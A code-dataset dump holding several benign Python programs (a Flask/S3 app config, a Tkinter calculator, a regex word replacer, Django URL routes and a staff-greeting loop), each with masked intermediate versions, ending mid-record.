app.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'
domain = app.config.get('SERVER_NAME')
port = environ.get('PORT', config['default_port'])
redirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])
client_uri = environ.get('CLIENT_URI', config['client_uri'])
client_s3 = boto3.resource('s3')
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
from os import environ
import boto3
from flask import Flask, redirect
from flask_sqlalchemy import SQLAlchemy
from json import load
from pathlib import Path
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / '../schemas.json', 'r') as fp:
schemas = load(fp)
with open(path / '../config.json', 'r') as fp:
config = load(fp)
app = Flask(__name__, template_folder='templates')
app.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'
domain = app.config.get('SERVER_NAME')
port = environ.get('PORT', config['default_port'])
redirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])
client_uri = environ.get('CLIENT_URI', config['client_uri'])
client_s3 = boto3.resource('s3')
@app.route('/')
def redirect_to_swagger():
return redirect('/swagger', 302)
<|reserved_special_token_1|>
from os import environ
import boto3
from flask import Flask, redirect
from flask_sqlalchemy import SQLAlchemy
from json import load
from pathlib import Path
path = Path(__file__).parent
db = SQLAlchemy()
with open(path / "../schemas.json", "r") as fp:
schemas = load(fp)
with open(path / "../config.json", "r") as fp:
config = load(fp)
app = Flask(__name__, template_folder="templates")
app.config["SECRET_KEY"] = "3205fc85cd004116bfe218f14192e49a"
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///app.db"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SWAGGER_UI_OAUTH_CLIENT_ID"] = "documentation"
domain = app.config.get("SERVER_NAME")
port = environ.get("PORT", config["default_port"])
redirect_uri = environ.get("REDIRECT_URI", config["redirect_uri"])
client_uri = environ.get("CLIENT_URI", config["client_uri"])
client_s3 = boto3.resource("s3")
@app.route("/")
def redirect_to_swagger():
return redirect("/swagger", 302)
|
flexible
|
{
"blob_id": "631904ae96584bd19756f9335175a419397ac252",
"index": 8562,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-2": "<mask token>\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\n<mask token>\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-3": "<mask token>\npath = Path(__file__).parent\ndb = SQLAlchemy()\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\napp = Flask(__name__, template_folder='templates')\napp.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'\ndomain = app.config.get('SERVER_NAME')\nport = environ.get('PORT', config['default_port'])\nredirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])\nclient_uri = environ.get('CLIENT_URI', config['client_uri'])\nclient_s3 = boto3.resource('s3')\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-4": "from os import environ\nimport boto3\nfrom flask import Flask, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom json import load\nfrom pathlib import Path\npath = Path(__file__).parent\ndb = SQLAlchemy()\nwith open(path / '../schemas.json', 'r') as fp:\n schemas = load(fp)\nwith open(path / '../config.json', 'r') as fp:\n config = load(fp)\napp = Flask(__name__, template_folder='templates')\napp.config['SECRET_KEY'] = '3205fc85cd004116bfe218f14192e49a'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SWAGGER_UI_OAUTH_CLIENT_ID'] = 'documentation'\ndomain = app.config.get('SERVER_NAME')\nport = environ.get('PORT', config['default_port'])\nredirect_uri = environ.get('REDIRECT_URI', config['redirect_uri'])\nclient_uri = environ.get('CLIENT_URI', config['client_uri'])\nclient_s3 = boto3.resource('s3')\n\n\n@app.route('/')\ndef redirect_to_swagger():\n return redirect('/swagger', 302)\n",
"step-5": "from os import environ\n\nimport boto3\nfrom flask import Flask, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom json import load\nfrom pathlib import Path\n\n\npath = Path(__file__).parent\n\n\ndb = SQLAlchemy()\n\nwith open(path / \"../schemas.json\", \"r\") as fp:\n schemas = load(fp)\n\nwith open(path / \"../config.json\", \"r\") as fp:\n config = load(fp)\n\napp = Flask(__name__, template_folder=\"templates\")\napp.config[\"SECRET_KEY\"] = \"3205fc85cd004116bfe218f14192e49a\"\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///app.db\"\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\napp.config[\"SWAGGER_UI_OAUTH_CLIENT_ID\"] = \"documentation\"\ndomain = app.config.get(\"SERVER_NAME\")\n\n\nport = environ.get(\"PORT\", config[\"default_port\"])\nredirect_uri = environ.get(\"REDIRECT_URI\", config[\"redirect_uri\"])\nclient_uri = environ.get(\"CLIENT_URI\", config[\"client_uri\"])\n\nclient_s3 = boto3.resource(\"s3\")\n\n\n@app.route(\"/\")\ndef redirect_to_swagger():\n return redirect(\"/swagger\", 302)\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = 'multiplication'
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = 'multiplication'
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
def button_equal():
sec_num = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, int(first_num) + int(sec_num))
if math == 'multiplication':
e.insert(0, int(first_num) * int(sec_num))
if math == 'subtraction':
e.insert(0, int(first_num) - int(sec_num))
if math == 'division':
e.insert(0, int(first_num) / int(sec_num))
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
root.title("Calculator")
e = Entry(root, width = 50, borderwidth = 5)
e.grid(row = 0, column = 0, columnspan = 4, padx = 10, pady = 20)
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = "addition"
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = "multiplication"
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = "subtraction"
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = "division"
first_num = e.get()
e.delete(0, END)
def button_equal():
sec_num = e.get()
e.delete(0, END)
if math == "addition":
e.insert(0, int(first_num) + int(sec_num))
if math == "multiplication":
e.insert(0, int(first_num) * int(sec_num))
if math == "subtraction":
e.insert(0, int(first_num) - int(sec_num))
if math == "division":
e.insert(0, int(first_num) / int(sec_num))
def clear():
e.delete(0, END)
#creating buttons
button_1 = Button(root, text = "1", height = 5, width = 10,command = lambda:button_click(1))
button_2 = Button(root, text = "2", height = 5, width = 10, command = lambda:button_click(2))
button_3 = Button(root, text = "3", height = 5, width = 10, command = lambda:button_click(3))
button_4 = Button(root, text = "4", height = 5, width = 10, command = lambda:button_click(4))
button_5 = Button(root, text = "5", height = 5, width = 10, command = lambda:button_click(5))
button_6 = Button(root, text = "6", height = 5, width = 10, command = lambda:button_click(6))
button_7 = Button(root, text = "7", height = 5, width = 10, command = lambda:button_click(7))
button_8 = Button(root, text = "8", height = 5, width = 10, command = lambda:button_click(8))
button_9 = Button(root, text = "9", height = 5, width = 10, command = lambda:button_click(9))
button_0 = Button(root, text = "0", height = 5, width = 10, command = lambda:button_click(0))
button_add = Button(root, text = "+", height = 5, width = 10, bg = "#A1CAE2", command = button_add)
button_mul = Button(root, text = "*", height = 5, width = 10, bg = "#A1CAE2", command = button_mul)
button_sub = Button(root, text = "-", height = 5, width = 10, bg = "#A1CAE2", command = button_sub)
button_div = Button(root, text = "/", height = 5, width = 10, bg = "#A1CAE2", command = button_div)
button_equal = Button(root, text = "=", height = 5, width = 10, bg = "#A1CAE2", command = button_equal)
button_clear = Button(root, text = "Clear", height = 5, width = 10, bg = "#A1CAE2", command = clear)
#placing buttons
button_1.grid(row = 3, column = 0)
button_2.grid(row = 3, column = 1)
button_3.grid(row = 3, column = 2)
button_4.grid(row = 2, column = 0)
button_5.grid(row = 2, column = 1)
button_6.grid(row = 2, column = 2)
button_7.grid(row = 1, column = 0)
button_8.grid(row = 1, column = 1)
button_9.grid(row = 1, column = 2)
button_0.grid(row = 4, column = 0)
button_add.grid(row = 4, column = 1)
button_sub.grid(row = 1, column = 4)
button_mul.grid(row = 2, column = 4)
button_div.grid(row = 3, column = 4)
button_equal.grid(row = 4, column = 2)
button_clear.grid(row = 4, column = 4)
root.mainloop()
|
flexible
|
{
"blob_id": "59a75f78c7a146dcf55d43be90f71abce2bcf753",
"index": 4934,
"step-1": "<mask token>\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_mul():\n global first_num\n global math\n math = 'multiplication'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_mul():\n global first_num\n global math\n math = 'multiplication'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_equal():\n sec_num = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, int(first_num) + int(sec_num))\n if math == 'multiplication':\n e.insert(0, int(first_num) * int(sec_num))\n if math == 'subtraction':\n e.insert(0, int(first_num) - int(sec_num))\n if math == 'division':\n e.insert(0, int(first_num) / int(sec_num))\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-5": "from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Calculator\")\r\n\r\ne = Entry(root, width = 50, borderwidth = 5)\r\ne.grid(row = 0, column = 0, columnspan = 4, padx = 10, pady = 20)\r\n\r\ndef button_click(number):\r\n\tdigit = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(digit) + str(number))\r\n\r\ndef button_add():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_mul():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_sub():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_div():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\t\r\n\tsec_num = e.get()\r\n\te.delete(0, END)\r\n\tif math == \"addition\":\r\n\t\te.insert(0, int(first_num) + int(sec_num))\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, int(first_num) * int(sec_num))\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, int(first_num) - int(sec_num))\r\n\tif math == \"division\":\r\n\t\te.insert(0, int(first_num) / int(sec_num))\r\n\r\ndef clear():\r\n\te.delete(0, END)\r\n\r\n\t\r\n#creating buttons\r\nbutton_1 = Button(root, text = \"1\", height = 5, width = 10,command = lambda:button_click(1))\r\nbutton_2 = Button(root, text = \"2\", height = 5, width = 10, command = lambda:button_click(2))\r\nbutton_3 = Button(root, text = \"3\", height = 5, width = 10, command = lambda:button_click(3))\r\nbutton_4 = Button(root, text = \"4\", height = 5, width = 10, command = lambda:button_click(4))\r\nbutton_5 = Button(root, text = \"5\", height = 5, width = 10, command = lambda:button_click(5))\r\nbutton_6 = Button(root, text = \"6\", height = 5, width = 10, command = lambda:button_click(6))\r\nbutton_7 = Button(root, text = \"7\", height = 5, width = 10, command = lambda:button_click(7))\r\nbutton_8 = Button(root, text = \"8\", height = 5, width = 10, command = lambda:button_click(8))\r\nbutton_9 = Button(root, text = \"9\", height = 5, width = 10, command = lambda:button_click(9))\r\nbutton_0 = Button(root, text = \"0\", height = 5, width = 10, command = lambda:button_click(0))\r\n\r\nbutton_add = Button(root, text = \"+\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_add)\r\nbutton_mul = Button(root, text = \"*\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_mul)\r\nbutton_sub = Button(root, text = \"-\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_sub)\r\nbutton_div = Button(root, text = \"/\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_div)\r\nbutton_equal = Button(root, text = \"=\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_equal)\r\nbutton_clear = Button(root, text = \"Clear\", height = 5, width = 10, bg = \"#A1CAE2\", command = clear)\r\n\r\n#placing buttons\r\nbutton_1.grid(row = 3, column = 0)\r\nbutton_2.grid(row = 3, column = 1)\r\nbutton_3.grid(row = 3, column = 2)\r\nbutton_4.grid(row = 2, column = 0)\r\nbutton_5.grid(row = 2, column = 1)\r\nbutton_6.grid(row = 2, column = 2)\r\nbutton_7.grid(row = 1, column = 0)\r\nbutton_8.grid(row = 1, column = 1)\r\nbutton_9.grid(row = 1, column = 2)\r\nbutton_0.grid(row = 4, column = 0)\r\n\r\nbutton_add.grid(row = 4, column = 1)\r\nbutton_sub.grid(row = 1, column = 4)\r\nbutton_mul.grid(row = 2, column = 4)\r\nbutton_div.grid(row = 3, column = 4)\r\nbutton_equal.grid(row = 4, column = 2)\r\nbutton_clear.grid(row = 4, column = 4)\r\n\r\nroot.mainloop()",
"step-ids": [
4,
5,
6,
7,
11
]
}
|
[
4,
5,
6,
7,
11
] |
<|reserved_special_token_0|>
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
import re, random, sys
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
# -- !/python3.10
# Mikhail (myke) Kolodin, 2021
# 2021-10-21 2021-10-21 1.2
# retext.py
# Заменить во входном тексте указанное слово на случайный вариант
# из предложенного набора заменителей.
# Параметры - в командной строке.
import re, random, sys
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) -> str:
""" заменятель """
return re.sub(f'(\W){aword}(\W)', r"\1"+random.choice(subs)+r"\2", " "+text+" ").strip()
def test1():
""" тестировщик """
w = "we"
s = ["they", "he", "she"]
print(w, "->", s, "\n", t1, "\n", redo(t1, w, s))
#test1()
def main():
""" запуск """
print("got params:", sys.argv)
argc = len(sys.argv)
if argc < 3:
print("Not enough parameters")
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print("text:", text)
print("out:", out)
with open(fot, 'w') as fo:
fo.write(out)
main()
|
flexible
|
{
"blob_id": "d1a179acfda9e76a11f362671fafb50773e2b9d3",
"index": 9405,
"step-1": "<mask token>\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-3": "<mask token>\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-4": "import re, random, sys\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-5": "# -- !/python3.10\n\n# Mikhail (myke) Kolodin, 2021\n# 2021-10-21 2021-10-21 1.2\n# retext.py\n# Заменить во входном тексте указанное слово на случайный вариант\n# из предложенного набора заменителей.\n# Параметры - в командной строке.\n\nimport re, random, sys\n\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\n\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\ndef redo(text: str, aword: str, subs: list) -> str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\W){aword}(\\W)', r\"\\1\"+random.choice(subs)+r\"\\2\", \" \"+text+\" \").strip()\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = \"we\"\n s = [\"they\", \"he\", \"she\"]\n print(w, \"->\", s, \"\\n\", t1, \"\\n\", redo(t1, w, s))\n\n#test1()\n\ndef main():\n \"\"\" запуск \"\"\"\n print(\"got params:\", sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print(\"Not enough parameters\")\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print(\"text:\", text)\n print(\"out:\", out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\nmain()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('', views.home, name='home'), path('category/', include
('api.category.urls')), path('product/', include('api.product.urls')),
path('user/', include('api.user.urls')), path('order/', include(
'api.order.urls')), path('payment/', include('api.payment.urls'))]
<|reserved_special_token_1|>
from django.urls import path, include
from . import views
urlpatterns = [path('', views.home, name='home'), path('category/', include
('api.category.urls')), path('product/', include('api.product.urls')),
path('user/', include('api.user.urls')), path('order/', include(
'api.order.urls')), path('payment/', include('api.payment.urls'))]
<|reserved_special_token_1|>
from django.urls import path,include
from .import views
urlpatterns = [
path('',views.home,name='home'),
path('category/',include('api.category.urls')),
path('product/',include('api.product.urls')),
path('user/',include('api.user.urls')),
path('order/',include('api.order.urls')),
path('payment/',include('api.payment.urls')),
]
|
flexible
|
{
"blob_id": "fe12f6d3408ab115c5c440c5b45a9014cfee6539",
"index": 564,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.home, name='home'), path('category/', include\n ('api.category.urls')), path('product/', include('api.product.urls')),\n path('user/', include('api.user.urls')), path('order/', include(\n 'api.order.urls')), path('payment/', include('api.payment.urls'))]\n",
"step-3": "from django.urls import path, include\nfrom . import views\nurlpatterns = [path('', views.home, name='home'), path('category/', include\n ('api.category.urls')), path('product/', include('api.product.urls')),\n path('user/', include('api.user.urls')), path('order/', include(\n 'api.order.urls')), path('payment/', include('api.payment.urls'))]\n",
"step-4": "from django.urls import path,include\nfrom .import views\n\nurlpatterns = [\n path('',views.home,name='home'),\n path('category/',include('api.category.urls')),\n path('product/',include('api.product.urls')),\n path('user/',include('api.user.urls')),\n path('order/',include('api.order.urls')),\n path('payment/',include('api.payment.urls')),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
staff = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА',
'токарь высшего разряда нИКОЛАй', 'директор аэлита']
def employee_name(name):
getting_a_name = name.split()
name_staff = getting_a_name[-1]
name_staff = name_staff.capitalize()
return name_staff
i = 0
while i < len(staff):
name_for_output = employee_name(staff[i])
print(f'Привет, {name_for_output}!')
i += 1
|
normal
|
{
"blob_id": "4c4275b96d3eceb5ff89a746c68d7f8736a1c2a5",
"index": 8561,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\n<mask token>\nwhile i < len(staff):\n name_for_output = employee_name(staff[i])\n print(f'Привет, {name_for_output}!')\n i += 1\n",
